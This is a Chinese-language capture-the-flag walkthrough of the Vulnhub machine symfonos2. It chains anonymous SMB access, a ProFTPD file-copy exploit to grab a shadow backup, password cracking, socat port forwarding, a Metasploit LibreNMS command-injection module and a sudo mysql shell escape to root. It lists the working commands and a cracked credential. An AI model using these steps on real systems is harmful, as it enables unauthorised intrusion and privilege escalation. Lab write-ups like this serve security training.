【Vulnhub】symfonos2

nmap 扫描一下端口

访问 80 端口有个图片（1920*1080 的还可以用来做壁纸）

nmap 扫出来的里面有个 ftp，访问需要验证身份

还有个 smb，通过 smbclient 连接一下：

smbclient //192.168.149.180/anonymous

密码那里直接回车就行

把里面的 log.txt 下到本地，然后查看一下，没发现 password 相关的，找到一个 user：aeolus

另外可以看一下 log.txt 第一行的内容

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak

用这个脚本，拷贝一下

https://github.com/chcx/cpx_proftpd/

然后 get 下来

看看 shadow，从这里面获得了用户的密码 hash

爆破一下，很快就能被跑出一个 aeolus:sergioteamo

用这个登录 ssh 成功

nmap 扫一下自己，发现有个 8080 口是开这个，但是只能本地访问

socat -d TCP-LISTEN:6666,fork,reuseaddr tcp:127.0.0.1:8080

然后本地访问就行了，火狐可能会禁止访问

此网址使用了一个通常用于网络浏览以外目的的端口。出于安全原因，Firefox 取消了该请求。

在火狐访问 about:config 然后新建一个

首选项名称：

network.security.ports.banned.override

值：

0-65535

就可以访问了

用 msf 的 linux/http/librenms_addhost_cmd_inject 进行攻击

set rhosts 192.168.149.180
set rport 6666
set username aeolus
set password sergioteamo
set lhost 192.168.149.180

这时候 sudo -l 可以发现 mysql 是可以不需要密码就能 sudo 运行的

可以在这里面找

https://gtfobins.github.io

mysql -e '\! /bin/sh'